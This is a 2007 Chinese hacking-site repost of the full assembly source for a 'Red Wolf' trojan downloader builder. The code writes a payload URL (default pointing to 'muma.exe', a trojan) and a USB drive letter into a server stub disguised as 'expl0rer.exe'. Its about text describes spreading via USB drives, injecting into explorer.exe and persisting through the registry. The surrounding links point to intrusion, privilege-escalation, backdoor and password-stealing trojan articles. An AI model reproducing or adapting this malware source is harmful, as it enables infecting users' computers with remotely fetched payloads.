·	没有路由密码权限时的鸽	08-23	·	上网安全 Vista自我防范	10-11
·	让濒临崩溃的Windows XP	10-11	·	有备无患，快速自制救急	10-11
·	要你好看!Windows看图工	10-11	·	空间赞助网提供不同类型	10-11
·	讨论net.exe和net1.exe的	10-10	·	让3389远程桌面传输更通	10-10
·	巧妙入侵渗透赌博站	10-10	·	Aspx空间扫权限工具	10-10
·	Windows2003最新提权工具	10-10	·	易淘乐提供100M免费全能	10-10
·	系统开机密码忘了不着急	10-09	·	中意网络提供免费100M免	10-09
·	与众不同 Windows XP开始	10-08	·	让桌面图标翻跟斗在XP上	10-08
·	上海宽元站长资助计划-提	10-08	·	个性化Windows XP的任务	10-07
·	趣盘提供3G免费网络硬盘	10-07	·	秀山热线提供200MB免费全	10-07
·	一次艰辛的提权过程	10-06	·	成功入侵IT大卖场的渗透	10-06
·	mysqlhack- MYSQL利用工	10-06	·	lanker一句话PHP后门客户	10-06
·	WIXI提供3G免费多媒体网	10-06	·	新人网络提供100M/ftp免	10-06
·	如何利用QQ带来高流量	10-05	·	UuShare提供免费网络文件	10-05

[推荐]红狼下载者v1.0源代码

热荐 ★★★★★

红狼下载者v1.0源代码

文章整理发布：黑客风云文章来源：www.05112.com 更新时间：2007-1-26 9:54:51

;******************************************************
;程序编写by Asm
;日期：2006-12-25日凌晨
;出处：http://www.wolfexp.net/（红狼安全小组）
;注意事项：如欲转载，请保持本程序的完整，并注明：
;转载自红狼安全小组(http://www.wolfexp.net/)
;******************************************************
.386
.model flat, stdcall
option casemap :none
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; Include 文件定义
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
include windows.inc
include user32.inc
includelib user32.lib
include kernel32.inc
includelib kernel32.lib
include shell32.inc
includelib shell32.lib
ModifyFile PROTO :LPSTR ;函数声明
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; Equ 等值定义
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
ICO_MAIN equ 1000h ;图标
DLG_MAIN equ 1
IDC_URL equ 1001
IDC_U equ 1002
IDC_About equ 1003
IDC_Out equ 1004
IDC_Wolf equ 1005
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; 数据段
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
.data?
hInstance dd ?
hWindow dd ?
hFile dd ?
hMap dd ?
pMapAddr dd ?
.data
szUrl db 156 dup(0)
szU db 156 dup (0)
FileName db 'expl0rer.exe',0
szText db '下载者配制成功！',0
szCaption db '恭喜',0
szCI db 'G:\',0
szMuma db 'http://www.wolfexp.exe/muma.exe',0
szSury db '你总该输入点什么东西吧 ^_^',0
szAbout db '这个下载者通过U盘传播，至于传播的U盘分区则是自己选择，H:\或者G:\，默认是H:\',0dh
db '注入explorer.exe进程，无dll，注册成注册表启动。可能在下个版本设置成系统服务的方式',0dh
db '如果你有什么好的建议，可以到红狼安全小组找我讨论',0dh
db '程序编写by Asm 红狼安全小组[C.R.S.T]',0dh,0ah,0
szTit db '关于工具的一点说明',0
szWolf db 'http://www.wolfexp.net/',0
szErorr db '没有找到原始服务端，无法进行配置！',0
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; 代码段
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
.code
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
_Process proc
local @stFindFile:WIN32_FIND_DATA
invoke FindFirstFile,addr FileName,addr @stFindFile ;查找是否有服务端
.if eax == INVALID_HANDLE_VALUE
invoke MessageBox,NULL,addr szErorr,NULL,MB_OK
.elseif
invoke CreateFile,addr FileName,GENERIC_READ or GENERIC_WRITE,\ ;打开它
FILE_SHARE_READ or FILE_SHARE_WRITE,NULL,OPEN_EXISTING, \
FILE_ATTRIBUTE_NORMAL,NULL
.if eax!=INVALID_HANDLE_VALUE
mov hFile, eax ;保存句柄
invoke CreateFileMapping,hFile,NULL,PAGE_READWRITE,0,0,NULL ;建立内存共享
.if eax!=NULL
mov hMap,eax ;保存句柄
invoke MapViewOfFile,hMap,FILE_MAP_WRITE,0,0,NULL ;读取内存共享
.if eax!=NULL
mov pMapAddr,eax ;保存句柄
invoke ModifyFile,pMapAddr ;修改服务端内存里内容
invoke UnmapViewOfFile,pMapAddr ;解除文件映射
.endif
invoke CloseHandle,hMap ;关闭内存映射文件
.endif
invoke CloseHandle,hFile ;关闭文件
.endif
.endif
ret
_Process endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
ModifyFile proc uses ebx esi edi,lpBufferAddress:LPSTR
mov edi,lpBufferAddress ;得到内存地址
add edi,0010a0h ;得到要写入的U盘分区的地址
invoke lstrcpy,edi,addr szU ;修改edi地址处的内容为szU所保存的
xor edi,edi ;清空这个edi，免得物理内存地址重复
mov edi,lpBufferAddress ;重新得到内存地址
add edi,001a24h ;得到要写入的木马的地址
invoke lstrcpy,edi,addr szUrl ;修改edi地址处的内容为szUrl所保存的
invoke MessageBox,NULL,addr szText,addr szCaption,MB_OK ;提示配置成功
ret
ModifyFile endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
_ProcDlgMain proc uses ebx edi esi hWnd,wMsg,wParam,lParam
mov eax,wMsg
.if eax == WM_CLOSE
invoke EndDialog,hWnd,NULL
.elseif eax == WM_INITDIALOG
invoke LoadIcon,hInstance,ICO_MAIN
invoke SendMessage,hWnd,WM_SETICON,ICON_BIG,eax
invoke SetDlgItemText,hWnd,IDC_URL,addr szMuma
invoke SetDlgItemText,hWnd,IDC_U,addr szCI
.elseif eax == WM_COMMAND
mov eax,wParam
.if ax == IDOK
invoke GetDlgItemText,hWnd,IDC_URL,addr szUrl,sizeof szUrl
invoke GetDlgItemText,hWnd,IDC_U,addr szU,sizeof szU
invoke lstrlen,addr szUrl
.if ax == NULL
invoke MessageBox,NULL,addr szSury,NULL,MB_OK
.elseif
call _Process
.endif
.elseif ax == IDC_About
invoke MessageBox,NULL,addr szAbout,addr szTit,MB_OK
.elseif ax == IDC_Out
invoke ExitProcess,NULL
.elseif ax == IDC_Wolf
invoke ShellExecute,0,0,addr szWolf,0,0,SW_SHOW
.endif
.else
mov eax,FALSE
ret
.endif
mov eax,TRUE
ret

_ProcDlgMain endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
start:
invoke GetModuleHandle,NULL
mov hInstance,eax
invoke DialogBoxParam,hInstance,DLG_MAIN,NULL,offset _ProcDlgMain,NULL
invoke ExitProcess,NULL
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
end start

文章录入：cainiaowang 责任编辑：cainiaowang

上一篇文章：熊猫烧香核心源码-Delphi编程

下一篇文章： TCP端口扫描的ASP实现

【字体：小大】

中介交易区

网游盗号木马实现手记	01-09
黑色技术蠕虫下载者[完整源码]	11-01
利用BCB自己打造QQ炸弹	10-23
从内存中加载并启动一个exe(delp	09-27
开启和关闭Windows xp 防火墙(de	09-27
让你的程序通过XP防火墙(delphi编	09-27
如何让你的程序安全通过windows防	08-20
如何透过程序来控制 Windows (XP	08-20
动易2005-2006算号器的源代码	08-11
API对注册表进行操作(Delphi编程	07-30
一段隐藏注册表项的代码	07-26
了解VB编写病毒的大体方法	07-02